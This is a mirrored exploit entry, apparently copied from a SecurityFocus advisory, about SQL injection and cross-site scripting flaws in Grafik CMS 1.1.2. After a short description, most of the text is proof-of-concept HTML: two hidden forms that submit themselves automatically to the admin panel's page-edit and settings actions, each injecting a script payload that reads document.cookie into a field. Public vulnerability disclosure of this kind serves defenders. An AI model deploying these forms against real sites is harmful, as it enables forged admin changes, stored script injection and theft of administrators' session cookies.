扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 |
source: https://www.securityfocus.com/bid/41227/info Grafik CMS is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Grafik CMS 1.1.2 is vulnerable; other versions may be affected. <form action="http://www.example.com/admin/admin.php?action=edit_page&id=1" method="post" name="main" > <input type="hidden" name="page_title" value="page title" /> <input type="hidden" name="page_menu" value='descr"><script>alert(document.cookie)</script>' /> <input type="hidden" name="id" value="1" /> <input type="hidden" name="page_content" value="some page content" /> <input id="sbmt" type="submit" name="submit" value="Modifier" /> </form> <script> document.getElementById('sbmt').click(); </script> <form action="http://www.example.com/admin/admin.php?action=settings" method="post" name="main" > <input type="hidden" name="name" value="site title" /> <input type="hidden" name="admin_mail" value="example@example.com" /> <input type="hidden" name="keywords" value="" /> <input type="hidden" name="description" value='descr"><script>alert(document.cookie)</script>' /> <input type="hidden" name="site_url" value="http://www.example.com/" /> <input type="hidden" name="seo_url" value="0" /> <input type="hidden" name="mailing" value="1" /> <input type="hidden" name="template" value="templates/default" /> <input id="sbmt" type="submit" name="submit" value="Valider" /> </form> <script> document.getElementById('sbmt').click(); </script> |
体验盒子
